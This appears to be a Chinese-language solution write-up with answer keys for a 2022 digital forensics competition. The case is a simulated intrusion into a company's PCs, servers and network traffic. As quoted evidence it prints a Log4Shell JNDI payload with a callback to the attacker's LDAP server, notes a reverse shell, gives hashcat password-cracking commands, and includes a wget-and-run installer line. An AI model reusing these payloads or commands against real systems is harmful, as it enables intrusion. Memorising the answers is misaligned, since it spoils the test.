2022年美亚杯团体赛
2022年美亚杯团体赛
AGC计算机
31.
[单选题] 分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ,它的实際安装时间是什么? (以时区UTC+8回答) (3分)
A. 2022-09-26 14:35:17
B. 2022-09-26 21:35:17
C. 2022-09-27 05:35:17
D. 2022-10-05 03:52:15
E. 2022-10-05 11:52:15
D
32
[单选题] AGC-CS计算机里的 ‘Acrobat DC’ 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (1分)
A. 2022-09-28 19:01:40
B. 2022-09-28 07:18:33
C. 2022-08-30 19:01:40
D. 2022-08-30 07:18:33
A
火眼只能分析出第二个安装时间 但是不是选项 取证大师能分析出两个 选和选项差不多的第一个时间
33
[单选题]AGC-CS计算机里的用户 'Carson' 链接了一个网络磁盘机 (Network Drive),在下列哪一个档案有相关资料? (2分)
A. \Users\Carson\NTUSER.DAT
B. \Users\admin\NTUSER.DAT
C. \Windows\System32\config\SYSTEM
D. \Windows\System32\config\SOFTWARE
E. \Windows\System32\config\SECURITY
A
根据34题 得知这个网络磁盘机是通过ip地址连接的 直接找ip 在跳转源文件就找到了
34
[单选题] 承上题,用户 ‘Carson’ 连接的网络磁盘机的IP地址是什么? (1分)
A. \192.168.182.134
B. \192.168.182.134\photo
C. \192.168.182.134\share
D. \192.168.182.134\AGC
E. \192.168.182.134\AGC photo
接上题
C
35
[填空题] 分析计算机里的电邮数据,当中包含嫌疑人王景浩可能的居住地址,请回答他住址的楼层 (以阿拉伯数字回答) (1分)
45
在邮件附件的账单中 找到一个地址
36
[填空题] 承上题,王景浩使用的信用卡号码最后四位数字是? (1分)
6717
在邮件中找到一张信用卡照片
37
[填空题] AGC-CS计算机用户 ‘Carson’ 曾经收到一个电邮并通过里面的链结下载了一个可疑的 ‘Word’ 文件,那个档案的档案名是什么? (不要输入 ‘.’,以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (1分)
KEFMUONDOCX
在收件箱中找到下载地址 尝试访问 但是无法访问QAQ
既然是下载的 那应该在用户的Download文件夹下 应该能找到一些东西
在文件分析中 找word文档 找到一个在download文件夹下的文件
38
[单选题] 承上题,分析该 ‘Word’ 文件,它的可能用途是? (3分)
A. 访问一个网站
B. 记录键盘操作
C. 把档案加密
D. 改变桌面壁纸
E. 关闭计算机
A
接上题 发现是一个可疑文件 放到云沙箱里面看一下
bcde选项的行为都没找到 看到一个和a选项很相关的行为
39
[单选题] AGC-CS计算机里有一个名为 ‘admin’ 的用户,它是在何时被建立的? (以时区UTC+8回答) (1分)
A. 2022-09-28
B. 2022-09-29
C. 2022-09-30
D. 2022-10-01
E. 以上皆非
B
直接翻日志 在日志分析——安全——账户管理中
40
[填空题] 黑客第一次采用用户 ‘admin’ 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)
20220929204102
用户要在创建之后才能登陆 由上题 admin在2022-09-29 20:41:02才被创建成功 找到登陆/注销日志 发现在创建之后 就使用显示凭据登录了
在账户登陆中 也可以看到 同时在网络地址中 也能看到登陆的ip并不是本地ip 也能证实是通过远程桌面协议登陆的
41
[填空题] 黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件,这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)
PUTTY
在安装软件里面找在admin账户创建之后下载安装的软件 只有这一个软件 经过download文件夹下载的
或者直接在浏览器下载记录中查看 时间也符合
搜一下这个软件能否进行端口扫描
42
[填空题] 承上题,黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 (‘Media Access Control’ Address - MAC Address) 并存到一个名为 ‘ip.txt’ 的档案。 当中 ‘192.168.182.130’ 计算机的MAC地址是什么? (不要输入 ‘:’ 或 ‘-’ ,以大写英文及阿拉伯数字回答) (3分)
9061AEC09045
找到这个ip.txt 但是已经被删了 但是我们已经知道了 黑客就是王景浩 因此这个ip.txt也会传到王景浩的电脑中 在分析王景浩的电脑 找到ip.txt
43
[填空题] AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 ‘admin’ 曾经采用记事本 (Notepad) 打开了一个文字档案,这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)
320A98F6519748D16B8870EF4D8A606D656C5A09CF2F660AA35EBF6495824CB1
在最近访问的文档中 可以看到 使用notepad打开 且用户是admin的文档只有ip.txt
44
[单选题] 黑客除了通过 ‘RDP’ 外,还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)
A. VNC
B. Teamviewer
C. Anydesk
D. Splashtop Business Access
E. RemotePC
B
在AGC的电脑中可以看到很多Teamviewer的痕迹
AGC服务器
服务器是三个软raid 直接全部挂载分析不出东西 详细说一下重组的过程 分为两种方法:UFS和取证大师
UFS
首先在UFS中打开三个镜像
全部打开后 就可以看到 已经识别组出原来的磁盘镜像agc:0
下面直接进行导出即可
取证大师
先创建一个案例 添加三个镜像
自动识别出动态磁盘 勾选确定进行解析
看到已经解析出raid重组后的盘来了
右键扫描磁盘结构
在制作镜像文件就行
45
[填空题] AGC_Server里LVM (Logical Volume Management 逻辑卷轴管理) 的 VG (Volume Group 卷组) ‘pve’ 共有多少PE (Physical Extent 物理块) ? (以阿拉伯数字回答) (1分)
114147
制作好之后 使用美亚的仿真软件 仿真起服务器
登root 查ip 但是发现没有ens33 重新配置网卡
cd /etc/network
cat interfaces
将上面改为下面的配置
systemctl restart networking
ifconfig
发现有ip了
连xshell
下面就可以做题了
vgdisplay
46
[填空题] AGC_Server里LVM 的 LV(邏輯卷)“pve-data” 使用了多少百分比的空間? (不用填寫 ‘%’,以阿拉伯数字回答) (3分)
2
df -h
47
[多选题] AGC_Server里的 ‘Proxmox’ 虚拟化环境 (Virtual Environment - VE) 有哪一个用户? (2分)
A. root
B. VM_admin
C. sysadmin
D. acl
E. tss
AC
要使用https协议进行登陆网页 访问192.168.70.132:8006
48
[填空题] 分析 ‘VM’ (虚拟机) 编号 ‘111’ AGC网站的网页服务器日志,当中记录了黑客曾向该服务器发出多少次與远程代码執行 (Remote Code Execution) 的网络攻击? (以阿拉伯数字回答) (2分)
17
UFS导出111的镜像需要会员 使用上面提到的网站仿真起虚拟机 但是不知道root密码
直接在UFS上手撸 查看/etc/nginx/conf.d/agcom.shop.conf网站配置文件 找到访问失败成功记录文件
没找到东西 但是在同目录下有很多其他日志
在里面找shell出现的次数 发现是17次
49
[单选题] 哪一个IP地址尝试登录’VM’ (虚拟机) 编号 ‘111’ 失败次数最多? (1分)
A. 38.242.130.207
B. 218.92.0.206
C. 43.142.93.22
D. 121.202.141.105
E. 61.238.217.108
A
在/var/log/btmp.1和/var/log/btmp中进行翻找 发现38.242.130.207出现的次数更多
50
[填空题] 黑客在入侵 ‘VM’ 编号 ‘111’ 后,打算涂改AGC公司的网页,黑客在传送相关档案时所用的端口 (Port) 是什么? (以阿拉伯数字回答) (3分)
22
在/usr/AGC/folder中找到黑客就是王景浩上传的文件 index.html中的内容确实表示王景浩篡改了网页
在王景浩的电脑中也发现了它使用scp向AGC服务器中传文件的命令行记录
scp默认使用的端口也是22
51
[多选题] 根据 ‘VM’ 编号 ‘111’ 里的网页服务器 (Web Server) 的设定,访客可从下列哪个网页地址访问这个服务器? (2分)
A. localhost
B. www.ag.com.shop
C. www.agcom.shop
D. agcom.shop
E. www.agcom.com
DE
还是查看配置文件
52
[填空题] 黑客曾入侵 ‘VM’ 编号 ‘111’ 里的电邮系统 ‘Xeams’,他登录的时间是? (以unix时间戳回答,格式如:1665049779010) (2分)
1665049779010
由王景浩部分可知 其电脑的ip是61.238.217.108 在server1中翻找 发现/$/opt/Xeams/AuditLogs下是Xeatm电邮系统的日志文件 找到王景浩电脑ip的登陆日志
53
[单选题] 黑客在入侵后盗用AGC员工电邮户口及冒充AGC员工回复了电邮给客户,发出这封电邮的操作系统 (Operating System) 及电邮软件 (Mail Agent) 是什么? (2分)
A. Mac OS X 10.15 rv:102.0 Thunderbird/102.3.0
B. Mac OS X 10.15 rv:102.0 Thunderbird/91.13.1
C. Mac OS X 10.11 rv:91.0 Thunderbird/91.13.1
D. Mac OS X 10.11 rv:60.0 Thunderbird/60.9.1
E. Windows 10 Pro Outlook 2016
D
由52题得知王景浩入侵电邮系统的时间 是在2022-10-06 17:49:39
那我们找发送邮件记录的时间也应当在10月6号17:49:39之后 在/$/opt/Xeams/GoodEmails中找到发送邮件的记录 在这四封邮件中进行寻找
应该是这封了 伪造邮件骗取钱财 在user-agent中找到信息
54
[单选题] 黑客在 ‘Proxmox’ 里留下了一个被加密了的程序 (Program),在解密后它的SHA-256哈希值 (Hash Value) 是什么? (2分)
A. C89D7A… …8C4E76
B. C7141F… …64BF65
C. E9433E… …1A5134
D. 45CE1C… …79BD4A
E. 0ACAA5… …AB7ECE
0acaa5332a0d035b6f90b12836b6fa84c45af5c76a7bda6f0c6bec77b3ab7ece
先是下载了三个文件 再将其合并为base.py 再将base.py解base 在重命名 然后使用python运行了这个程序 之后将这两个文件都删除了 但是1 2 3 三个文件没有删除 我们还是可以进行恢复的
在/$/srv/samba/share/AGC photo(通过看命令行进目录的记录)文件夹下我们可以找到这三个文件 导出 进行恢复
55
[填空题] 承上题,分析程序代码 (Program Code),上述程序的档案名应该是什么? (不要输入 ‘.’,以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (3分)
RANSOMWAREVERFINALV2PY
56
[单选题] 于虚拟机 ‘VM’ 编号 ‘111’ 里的档案 ‘\srv\samba\share\AGCphoto\DSC01139.JPG’ ,照片中出现的街道名称是? (2分)
A. 河背街
B. 沙咀道
C. 众安街
D. 香车街
E. 川龙街
C
上题提到的加密脚本 后面被注释的部分就是解密脚本
在/$/srv/samba/share/AGC photo找到被加密的图片 在/$/tmp找到密钥文件 thekey.key 应该仿真起来 在虚拟机中直接运行就行
AGC流媒体服务器
2
[填空题] 就AGC集团网络的流媒体服务器 (Media Server),有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)
3
也可以用命令
sudo last
3
[填空题] 就AGC集团网络的流媒体服务器,有多少个本地用户曾经成功用 ‘ssh’ (Secure Shell)登录过? (以阿拉伯数字回答) (2分)
3
一共是3个ip
也可以用命令
lastlog
4
[填空题] 就上述的本地用户,成功通过 ‘ssh’ 登录过该流媒体服务器多少次? (以阿拉伯数字回答) (3分)
12
还是上面那张图 一共是12次
5
[单选题] 试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 ‘ssh:notty’ 登录该流媒体服务器? (2分)
A. iamhacker
B. hacking
C. hack
D. hacker
E. 以上皆非
C
使用 /var/log/btmp文件查看暴力破解系统的用户 /var/log/btmp文件是记录错误登录系统的日志 如果发现/var/log/btmp日志文件比较大,大于1M,就算大了,就说明很多人在暴力破解ssh服务,此日志需要使用lastb程序查看
/var/log/wtmp文件的作用 /var/log/wtmp也是一个二进制文件,记录每个用户的登录次数和持续时间等信息。
我们在备份日志文件中找到btmp日志 就可以查看登录失败的人
也可以使用命令
lastb -f /home/btmp
6
[填空题] 就该流媒体服务器的本地用户, 有一个用户名是 ‘S’ 开头的, 该用户的姓氏是什么? (以大写英文回答) (3分)
LI
直接进行仿真 这里在仿真的时候要将5个盘全部挂上 不然后面找media的时候会找不到 选择重置密码即可登陆peter和user1的账户时显示需要重置密码 并且密码的长度必须大于8不能是弱密码 那就随便编一个稍微复杂点的密码 96315001 登陆成功
我们从AGC集团调查报告中 可以获取一点信息
先连xshell 连的时候直接连root用户就行 密码已经重置为123456了
上面的调查报告中提到 有lsblk和zpool status 检查一下 都没有问题
lsblk命令的英文是“list block”,即用于列出所有可用块设备的信息,而且还能显示他们之间的依赖关系,但是它不会列出RAM盘的信息。块设备有硬盘,闪存盘,CD-ROM等等。lsblk命令包含在util-linux-ng包中,现在该包改名为util-linux。
"zpool status"是一个命令行指令,用于检查ZFS存储池的状态。它可以显示存储池的健康状态、错误信息、磁盘状态等信息。如果存储池处于DEGRADED状态,它还可以提供一些修复建议。可以使用不同的选项来获取更详细的信息,例如“-v”选项可以列出带有详细说明的完成错误列表,“-T”选项可以显示时间戳
最后一行errors:No known data errors就是现在服务器中的硬件没有出现问题的
连上xftp 还是看一下/www文件夹 发现是个wordpress的网站 看一下数据库 这玩意好像没密码 直接进去了
mysql
show databases
show columns from wp_users
select * from wp_users
可以看到sammy的姓氏是LI
7
[多选题] 该流媒体服务器是有使用Docker容器 (Docker Container) 的,当中包含以下哪个Docker镜像 (Docker Image) ? (3分)
A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非
BCDE
也可以使用命令
docker images
8
[单选题] 就上述的Docker镜像,哪一个镜像在系统上运行中? (2分)
A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非
D
docker ps -a(查看所有正在运行和运行过的镜像)
下面说一下docker一把梭
## 先查看是否有docker-compose,有docker-compose起docker-compose即可
docker-compose
docker-compose up -d # 在后台启动服务
docker-compose ps # 查看启动的服
docker-compose stop #停止服务
docker-compose stop && docker-compose rm && docker-compose down
## 无docker-compose,手工单独起docker 优先使用历史记录中的命令
systemctl start docker 运行docker
docker version 查看docker版本
docker info 显示Docker 系统信息,包括镜像和容器数
uname –r 检查内核版本
/etc/docker/daemon.json Docker配置
docker images或docker image ls(manage images) 列出所有镜像
docker image ls --no-trunc 不截断IMAGE ID
docker ps 列出所有运行中的容
docker ps -a 列出所有容器
docker start|stop|restart 启动、停止和重启一个或多个指定容器
docker run 镜像名称/id
docker run -d 镜像名称/id 后台运行
docker run -it 镜像名称/id /bin/bash 加载shell
docker run -P 随机端口映射
docker run -p 指定端口映射
--name= "my-worpress" 为容器指定一个名称
--net="bridge" 指定容器的网络连接类型
--link=[] 添加链接到另一个容器
--volume ,-v 绑定一个卷
-v ~/nginx/conf.d:/etc/nginx/conf.d -v ~/nginx/nginx.conf:/etc/nginx/nginx.conf 宿主机绝对路径:容器内绝对路径
docker kill 杀死一个或多个指定容器进程
docker top 查看一个正在运行容器进程,支持 ps 命令参数
docker inspect检查镜像或者容器的参数
docker pause 暂停某一容器的所有进程
docker exec -it containerID /bin/bash 进入docker容器
docker logs 查看容器日志
docker cp 容器ID:文件路径 宿主机目录 从容器中拷贝指定文件或者目录到宿主机中
docker diff 检查容器里文件结构的更改
docker history nginx
docker ps -a --no-trunc
/var/lib/docker/container/id/id-json.log 日志
--link 在hosts文件增加映射 容器名称 id 对应ip
docker run -d -p 8080:80 nginx
-p: 指定端口映射,格式为:主机(宿主)端口:容器端口
–volume , -v: 绑定一个数据卷
-d: 后台运行容器,并返回容器ID;
–name=“redis”: 为容器指定一个名称;
-e username=“ritchie”: 设置环境变量;
-m :设置容器使用内存最大值;
数据卷容器
多容器共享数据卷
docker run -id --name db_data -v /db_data centos:7 创建数据卷容器
docker run -id --name db1 --volumes-from db_data centos:7 挂载
docker run -id --name db2 --volumes-from db_data centos:7 挂载
导入导出
镜像 docker save docker load
容器 docker export docker import (镜像)docker run 来运行
网络
--net=bridge 默认 桥接NAT
--net=host 和主机共享
--net=none
--net=container=NAME or id 指定共享容器网络
--net=my_net 自定义网络
## 实在部署可视化管理工具portainer
部署portainer(离线)
docker save portain-ce:latest -o portainer.tar
docker load -i portainer.tar
docker run -d -p 9000:9000 --name=portainer --restart=always -v /var/run/docker.sock:/var/run/docker.sock -v portainer_data:/data portainer-ce:latest
部署portainer(在线)
docker pull portainer/portainer-ce
docker volume create portainer_data
docker run -d -p 8000:8000 -p 9000:9000 --name=portainer --restart=always -v /var/run/docker.sock:/var/run/docker.sock -v portainer_data:/data portainer/portainer-ce
### 新版宝塔也支持docker管理了,但是会破坏一部分环境,遇到疑难问题时可尝试
centos:
yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh ed8484bec
ubuntu:
wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh ed8484bec
9
[多选题] 该流媒体服务器是使用 ‘WordPress’ 建站 (Create Website) 的, 就 ‘比特币’ 标题, 有以下的电子邮箱地址曾经留有评论? (2分)
A. cn.wordpress.org
B. root58462@mail.qq.com
C. hi456@163.com
D. root@163.com
E. user1@localhost.net
F. 以上皆非
CD
查看服务器的历史命令可以得知 wordpress这个网站主要是由sammy搭建的 还有很多搭建时的命令
mysql apache2服务都用了 检查一下服务是不是都正常开启的
systemctl status apache2
systemctl status mysqld
刚刚通过xftp也看到了网站的根目录在/www/wordpress下 直接访问192.168.70.131/wordpress
访问比特币这个网页
网页打不开 因为给又分配了一个url
改回去就行
但是我们是看不到邮件的 还是翻数据库
10
[单选题] 该流媒体服务器里其中一个本地用户是有使用 ‘calendar’ 日历工具的, 日历内曾经提及以下哪个网站? (3分)
A. https://weibo.com
B. http://www.baidu.com
C. https://www.douyin.com
D. https://youku.com
E. https://www.binance.com
F. 以上皆非
E
使用user用户登陆服务器 查看calendar 翻一翻 在2022年12月找到一个虚拟交易网的记录
11
[单选题] 该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)
A. RAID 0
B. RAIDz2
C. RAIDz3
D. RAID 10
E. RAID 5
F. 以上皆非
D
使用上面提到的zpool status命令看一下储存池的状态
里面提到mirror-0和mirror-1 看起来很像raid10的模式
12
[单选题] 该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份? (2分)
A. Jun
B. Jul
C. Aug
D. Sep
E. Oct
F. 以上皆非
D
在根目录下找到一个media0文件夹 进去之后找到一个迷住了_幼_迷住.mp4视频 就是目标影片 在xftp中能看到最后修改时间是9月
13
[填空题] 承上题,拥有该段儿童色情影片的用户名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答) (1分)
ROOT
接上题
14
[填空题] 就AGC集团网络的流媒体服务器,曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果,该用户所输入的网址是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 https://web3.com,需回答 HTTPSWEB3COM) (2分)
HTTPSBITLY3XYI8B5
由上题 得知儿童色情影片的拥有者是root 在查看root用户的历史命令时看到这样一条
curl -i -o link.html https://bit.ly/3xyi8b5
这段命令的作用是使用curl工具从https://bit.ly/3xyi8b5下载文件,并将服务器的响应头信息输出到终端。其中,-i选项表示输出响应头信息,-o选项表示将下载的文件保存为link.html
找一下link.html 发现/home/peter/link.html
find / -name link.html
访问一下 通过这个moved here 会直接跳转到儿童色情的搜索栏中
再将上面的内容解一下url编码 发现儿童色情关键词 说明就是从https://bit.ly/3xyi8b5网站下载的
15
[填空题] 该基本镜像存储池 (pool) 有一个快照 (Snapshot),快照的名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 media/mediapool@abc123,需回答MEDIAMEDIAPOOLABC123) (1分)
MEDIASTORAGE@VERESION1
使用命令
zfs list -t snapshot
16
[填空题] 就上述所找到的基本镜像存储池快照 (Snapshot),它储存了多少个档案? (以阿拉伯数字回答) (1分)
24
找到了快照文件 直接翻在/media0/mediastorage中
AGC流量包
21
[单选题] 分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 ‘GET’ 指令,它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)
A. http://155.137.195.111:8080
B. http://www.w3.org/2003/05/soap-envelope
C. http://61.238.217.108:8000
D. 以上皆非
A
找到61.238.217.108发送的第一个get指令
追踪tcp流
22
[单选题] IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 ‘POST’ 指令,它在 ‘HTML Form’ 项目的 ‘uname’ 栏所输入的字符串是什么? (1分)
A. root
B. ${jndi:ldap://61.238.217.108:1389/a}
C. application/x-www-form-urlencoded
D. password
B
直接向下翻找 找到第11个流 是攻击机向服务器发送的post指令 找到传入的uname参数的值 进行url解码
${jndi:ldap://61.238.217.108:1389/a}
23
[单选题] AGC服务器10.0.66.184收到IP地址61.238.217.108的 ‘POST’ 指令后,它执行了哪些行动? (2分)
A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口
B. 于IP地址61.238.217.108下载了Exploit.class
C. 使用端口49264连接IP地址61.238.217.108发送同步要求
D. 以上皆是
D
传入post指令是第11个流 我们继续向下翻找 第13个流是于IP地址61.238.217.108下载了Exploit.class
第12个流是使用端口46858连接IP地址61.238.217.108的LDAP服务器的1389端口
第14个流是使用端口49264连接IP地址61.238.217.108发送同步要求 可以看到攻击机通过连接服务器 在其上进行命令行执行
24
[填空题] 在上述行动后,IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)
9001
接上题
25
[多选题] AGC服务器10.0.66.184里有一个AGC目录 (Directory),它的子目录 (Sub Directory) 包含以下哪一个? (2分)
A. Accounting
B. Picture
C. Staff
D. Sambashare
E. Retail
ACE
26
[多选题] 入侵者迸入AGC服务器10.0.66.184后,他成功执行以下哪些指令? (2分)
A. 檢视了readme.txt内容
B. 删除了三个档案
C. 删除了一个目录 (Directory)
D. 替档案改名
E. 建立了两个txt档案
DE
还是在第14个流中
27
[单选题] 入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename),这个档案的原来名称是什么? (1分)
A. cGhvdG9zT0Zyb2NreQ==
B. Finanical.xls
C. readme.txt
D. anonymous
A
接上题
28
[单选题] 承上题,该档案原档的建立日期是什么? (2分)
A. 2022-10-21 08:10:30 (UTC+0)
B. 2022-10-21 16:19:39 (UTC+0)
C. 2022-10-22 08:10:30 (UTC+0)
D. 2022-10-22 14:22:06 (UTC+0)
E. 2022-10-22 16:19:39(UTC+0)
C
29
[单选题] 承上题,该档案的SHA-256哈希值是什么? (3分)
A. a6eef1… …27364c
B. 54785c… …fe86f0
C. 961f2b… …647d55
D. a00e6c… …d0eaab
E. 以上皆非
B
由上题我们可以看到这是用ftp协议传输的文件 我们选择导出对象——FTP-DATA 将下载的文件导出
计算哈希值
王景浩计算机
30
[多选题] 通过取证调查结果迸行分析 (包括但不限于以上问题及情节),以下哪项关于王景浩的推断是正确的? (5分)
A. 曾经采用他的计算机入侵AGC集团网络
B. 传播儿童色情物品
C. 于AGC集团取得大量客户资料
D. 通过VPN取得Rooney家里的IP地址
E. 企图更改AGC集团的网页
ACDE
57
[单选题] 王景浩的计算机使用什么文件系统 (File System) ? (1分)
A. exFAT
B. APFS
C. HFS
D. HFS+
D
58
[单选题] 王景浩计算机的操作系统 (Operating System) 版本是什么? (1分)
A. 10.4.11
B. 10.9.5
C. 10.10.5
D. 10.11.6
D
59
[填空题] 王景浩的计算机当前有多少个用户 (包括访客 'Guest' )? (以阿拉伯数字回答) (1分)
6
最后一个被删除了 所以还剩下6个
60
[填空题] 王景浩的计算机里有一个用户被删除,被删除的用户名称是什么? (以大写英文回答) (1分)
BROTHER
接上题
61
[填空题] 王景浩的计算机有多少个 '聚焦' 的搜索记録 (Spotlight Search) ? (以阿拉伯数字回答) (1分)
9
直接搜
62
[单选题] 当用户设置了自动登录 (Auto Login) 后,王景浩计算机的操作系统会产生哪个档案? (2分)
A. manifest.plist
B. info.plist
C. PasswordPanel.strings
D. kcpassword
D
chatgpt做题法
63
[单选题] 王景浩计算机的登录密码 (Login Password) 是什么? (2分)
A. 1qa@WS3ed
B. 3ed$RF5tg
C. 5tg^YH7uj
D. 2ws$RF6yh
按上题 直接去找kcpassword文件 全局搜索
但是这里打开是乱码 我们使用x-ways打开
64
[单选题] 在王景浩的计算机里,他最后使用哪个电邮地址登录 'iCloud' 账号? (2分)
A. kinghoo0w0@gmail.com
B. wonghoo588@yahoo.com
C. kingho726@aol.com
D. kinghoo0w0@yahoo.com
D
65
[多选题] 王景浩计算机里的手机备份 (iTunes Backup) 包含哪些iOS版本? (2分)
A. 12.5.6
B. 15.4
C. 15.5
D. 16.0.3
AC
66
[填空题] 王景浩曾经将一台 iPhone 6 连接他的计算机,请问它最后的连接时间是什么? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)
20220819152402
在火眼中找蓝牙连接信息 在已配对中找到一个 但是是王景浩ios备份中的iPhone XR
又在未配对中找到一个iPhone 对应的应该是iPhone 6的手机系统
67
[单选题] 苹果手机备份的密码 (iTunes Backup Encryption Password) 会记录在什么档案? (2分)
A. Info.plist
B. privacy.json
C. Manifest.plist
D. PasswordPanel.strings
C
算是一个积累吧 对四个文件都进行了全局搜索 B是找不到的 找C的时候 看了一眼路径 里面提到Backup备份文件夹 感觉就八九不离十了
一共有两个这样的Manifest.plist文件 都是在Backup文件夹下的备份 将其提取出来 放在passwarekit中 竟然还能爆破密码
68
[多选题] 以下哪种工具可以用作破解密码? (1分)
A. Passware
B. John The Ripper
C. HashCat
D. Password Recovery Toolkit
ABCD
都是老熟人 都可以爆破密码
69
[多选题] 通过 'hashcat' 破解 'iTunes Backup' 密码需要制订一个 'txt' 档案,若该备份的手机iOS版本是10以上,需要按照下列哪个提示字符 (String) 的数据去制订这个 'txt' 档案? (3分)
A. WPKY
B. ITER
C. SALT
D. DPIC
E. DPSL
ABCDE
找到一篇文章使用hashcat恢复IOS/iPad备份密码 里面有描述使用哪些字符去制定txt档案
在这篇文章中也提到了在macos中ios备份的路径是~/Library/Application Support/MobileSync/Backup/
同时 还提供了使用hashcat恢复备份文件密码的具体办法 下个脚本提取出密码的hash值 恢复ios备份文件密码脚本 在使用hashcat进行爆破
这里假设密码已知是四位数字 进行掩码爆破
hashcat -d 1 -m 14800 hash.txt -a 3 '?d?d?d?d' # ios10以上的版本 使用14800参数
hashcat -d 1 -m 14700 hash.txt -a 3 '?d?d?d?d' # ios9以前的版本 使用14700参数
70
[填空题] 王景浩采用了4位数字加密了他的iPhone XR的备份,分析它的密码是什么? (以阿拉伯数字回答) (3分)
2022
接上题 我们在这里使用passwarekit进行爆破密码即可
71
[填空题] 最后一次连上王景浩计算机的3D打印机的IP 地址是什么? (不要输入答案中的 '.',以阿拉伯数字回答) (2分)
1014140
在无线网络信息中找到3D打印机的记录
再在浏览器历史记录中找2022-10-20 16:28:06 时间左右的访问记录 第一条网页没打开 那就是第二个出现的url
72
[填空题] 3D打印机最后一次在王景浩的计算机尝试打印的时间? (以时区UTC+8回答) (2分)
20221020162806
接上题
73
[单选题] 最后一次经由王景浩计算机打印的3D图档案名字是什么? (2分)
A. CE3_balljoint_extender.gcode
B. um3-penguin-real-mini-keychain-merged-tpu.gcode
C. CE3_Prancer.gcode
D. CE3_2020-psu-atx-mount.gcode
D
直接全局搜索了 找最后访问的时间最晚的 就是CE3_2020-psu-atx-mount.gcode
74
[单选题] 王景浩计算机的Safari浏览器的默认搜索引擎 (Default Search Engine) 是什么? (2分)
A. 百度
B. 谷歌
C. 360
D. Safari
B
大部分搜索记录都是谷歌
75
[单选题] 分析王景浩计算机的数据,王景浩的比特币钱包 (Bitcoin Wallet) 地址是什么? (2分)
A. bc1quw… ...zpzjzt
B. bc1qm… ...5f7n9g
C. bc1q79… ...h4sq52
D. bc1qsl… ...je7hkk
A
在MacMail的附件中 找到一张收款码
76
[单选题] AGC公司员工 'Carson' 有一个由公司发给他的电邮账户,分析王景浩的计算机数据并找出 'Carson' 的电邮账户密码。 (2分)
A. AGC2020@pw
B. AGC2012@PW
C. AGC2020@hkg
D. AGC2021@PW
A
其实在AGC的计算机中已经可以分析出来了
77
[填空题] 王景浩曾经冒充AGC公司员工 'Carson' 发送电邮给AGC 客户,这封电邮的 'Message-ID' 是什么? 回答它的首8位数值。(以大写英文和阿拉伯数字回答,如 4GEF90GD) (2分)
004001D8
在邮箱中其实能找到两封符合要求的邮件 但是查看十六进制 发现两封的message-id其实是一样的
78
[多选题] 王景浩采用计算机里的哪种工具进入和盗取AGC公司的数据? (2分)
A. Teamviewer
B. OpenVPN
C. Remote Desktop Manager
D. Tor Browser
ABC
ABC三种软件计算机中都有 都是用来远程连接的 而王景浩是通过远程连接来入侵AGC公司的计算机的 所以三个都是 D洋葱浏览器是暗网浏览器 但是不会设计入侵外部计算机
79
[多选题] 王景浩在AGC公司盗取了下列什么类型的档案? (2分)
A. ost
B. xlsx
C. jpg
D. docx
AB
80
[填空题] 王景浩的计算机于2022年9月29日曾经接上一个虚拟专用网络 (Virtual Private Network - VPN),这个VPN的IP地址是什么? (不要输入答案中的 '.',以阿拉伯数字回答) (2分)
61238217108
接78题 王景浩是使用Openvpn伪造ip来进行入侵AGC计算机 那么AGC计算机上显示的远程桌面的客户端地址就是王景浩计算机连上的vpn的ip
81
[填空题] 装置 '「KingHoo」的iPhone' 的蓝牙媒体访问控制地址 (MAC Address) 是什么? (不要输入答案中的 ':' 或 '-' ,以大写英文及阿拉伯数字回答) (1分)
82
[单选题] 王景浩何时将 '小宝' 加为iPhone XR的手机联络人 (Contact) ? (以时区UTC +8回答) (1分)
A. 2022年07月14日
B. 2022年07月15日
C. 2022年07月16日
D. 2022年07月17日
E. 2022年07月18日
A
83
[单选题] 王景浩的iPhone XR显示他的汇丰银行户口于2022年9月19日收到多少存款? (1分)
A. HKD298.8
B. HKD344.7
C. HKD396
D. HKD543
E. HKD465.1
B
84
[单选题] 王景浩的iPhone XR没有收藏 (Bookmark) 哪家音响品牌的网页? (1分)
A. KEF
B. EDIFIER
C. BOSE
D. YAMAHA
E. Bowers & Wilkins
D
85
[单选题] 王景浩的iPhone XR手机记录了他曾于2022年8月26日试飞无人机, 当天试飞的地点在哪里? (2分)
A. 大埔海滨
B. 启德
C. 数码港
D. 西环
E. 将军澳
D
学到一点 无人机的文件夹在AppDomain-com.dji.golite中 将这个文件夹提取出来 放到物联取证大师中分析一下 找到2022年8月26日的飞行记录
